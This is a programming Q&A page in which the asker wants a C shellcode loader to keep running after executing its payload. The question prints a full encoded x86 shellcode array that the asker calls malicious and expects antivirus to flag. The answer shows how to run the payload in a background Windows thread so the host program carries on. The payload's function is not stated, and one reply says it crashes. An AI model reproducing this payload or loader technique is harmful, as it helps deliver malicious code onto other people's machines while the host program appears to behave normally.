Search code examples
cshellcode

C program hangs / suspends while executing shellcode


#include <stdio.h>
char shellcode[] = "some shellcode here";
int main (int argc, char **argv) {
    void (*sptr)();
    sptr = (void(*)()) (&shellcode);
    sptr();
    printf("must display this");
    return 0;
}

While running the program, it executes the sptr() and hangs there, probably because of the shellcode is running in memory. printf("..") is never executed. My problem is I want the program to execute printf().

Please help :)

Reply to Eric Finn and Alvin Wong

I changed as what both of you instructed and the error I got is:

Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved.

X:>"my program.exe" '»".¼' is not recognized as an internal or external command, operable program or batch file. must display this

char shellcode[] is valid. I have compiled it successfully before.

below is the original code with malicious shellcode so your antivirus should detect it, just to verify you guys that the shellcode is not the problem:

#include <stdio.h>
#include <stdlib.h>

char shellcode[] = "\xda\xd3\xd9\x74\x24\xf4\xbd\xe9\x6d\xf8\x29\x58\x33\xc9\xb1"
"\x58\x31\x68\x18\x83\xe8\xfc\x03\x68\xfd\x8f\x0d\xd5\x15\xc6"
"\xee\x26\xe5\xb9\x67\xc3\xd4\xeb\x1c\x87\x44\x3c\x56\xc5\x64"
"\xb7\x3a\xfe\xff\xb5\x92\xf1\x48\x73\xc5\x3c\x49\xb5\xc9\x93"
"\x89\xd7\xb5\xe9\xdd\x37\x87\x21\x10\x39\xc0\x5c\xda\x6b\x99"
"\x2b\x48\x9c\xae\x6e\x50\x9d\x60\xe5\xe8\xe5\x05\x3a\x9c\x5f"
"\x07\x6b\x0c\xeb\x4f\x93\x27\xb3\x6f\xa2\xe4\xa7\x4c\xed\x81"
"\x1c\x26\xec\x43\x6d\xc7\xde\xab\x22\xf6\xee\x26\x3a\x3e\xc8"
"\xd8\x49\x34\x2a\x65\x4a\x8f\x50\xb1\xdf\x12\xf2\x32\x47\xf7"
"\x02\x97\x1e\x7c\x08\x5c\x54\xda\x0d\x63\xb9\x50\x29\xe8\x3c"
"\xb7\xbb\xaa\x1a\x13\xe7\x69\x02\x02\x4d\xdc\x3b\x54\x29\x81"
"\x99\x1e\xd8\xd6\x98\x7c\xb5\x46\xc0\x0a\x45\xfe\x7d\x9a\x2b"
"\x97\xd5\x34\xf8\x10\xf0\xc3\xff\x0b\xcd\x34\xa8\xe4\x79\x9c"
"\x3d\x0a\xd2\x4a\xf8\x5c\xa3\x2d\x03\xb5\xb8\x79\xa7\x04\xf6"
"\x2f\x06\x0c\x0b\x81\xf9\xb8\x5b\x21\xfa\x38\x0f\x71\x92\x6f"
"\x26\xee\xa4\x70\xed\xfa\x1d\xd7\x3f\x2f\x0f\x8f\x3f\xcd\x90"
"\xcb\x12\x83\x82\x82\xc0\x73\x4b\xcf\xb0\x5d\xb0\xf0\xee\x2b"
"\x00\x64\x01\x77\xbc\x87\x76\xd0\xe9\x20\x2f\xb6\x38\xc8\xd7"
"\x3d\xbc\x01\x62\x01\x37\xb3\x26\xf6\xa8\x28\x51\x1d\x81\x46"
"\x65\x1d\xed\x69\x45\x98\x22\xf8\xdf\x5c\x43\x6a\x10\xe9\xe1"
"\x3c\x2f\xc7\x8c\x80\xa7\xe8\x40\x00\x38\x81\x60\x00\x78\x51"
"\x36\x68\x20\xf5\xeb\x8d\x2f\x20\x98\x1e\x83\x42\x78\xf7\x4b"
"\x55\xa7\xf7\x8b\x06\xf1\x9f\x99\x3e\x74\xbd\x61\xeb\x02\x81"
"\xea\xd9\x86\x06\x12\x21\x1d\xc8\x61\x40\x46\x0b\x61\xef\x88"
"\x74\x8d\x9d\x1f\xe9\x00\x31\x93\x82\x82\xb9\x7d\x3f\x24\x2f"
"\x82";

int main (int argc, char **argv) {

void (*sptr)();
    sptr = (void(*)()) (&shellcode);
    sptr();
    printf("must display this"); // instead of more lines i put this one
    return 0;
}

the above code compiles successfully and runs perfectly

i changed some lines to system(shellcode). it compiles but doesnt run properly


Solution

  • As my understanding, you want to run some "machine code" (not shellcode), and no matter how the code runs it should continue the program.

    This is possible, by using threading.

    First add these includes:

    #include <windows.h>
    #include <process.h>
    

    And in your code:

    void (*sptr)(void*);                  // Type for `_beginthread`
    sptr = (void(*)(void*)) (&shellcode); // PLEASE rename to `machinecode`
    _beginthread(sptr,0,NULL);            // This starts your code in a new thread
    Sleep(5000);                          // Wait for 5000 ms
    printf("must display this");
    

    Of course this is not a proper way to multi-thread a program, but since your code is "machine code" there's not much to be done.

    P.S. When I try your code it finally reaches an "Access violation" (segmentation fault) (and it shows the "x.exe encountered a problem" dialog), and my antivirus didn't detect anything (do I need to switch to another one??), so you may need to review the code or add an exception handler...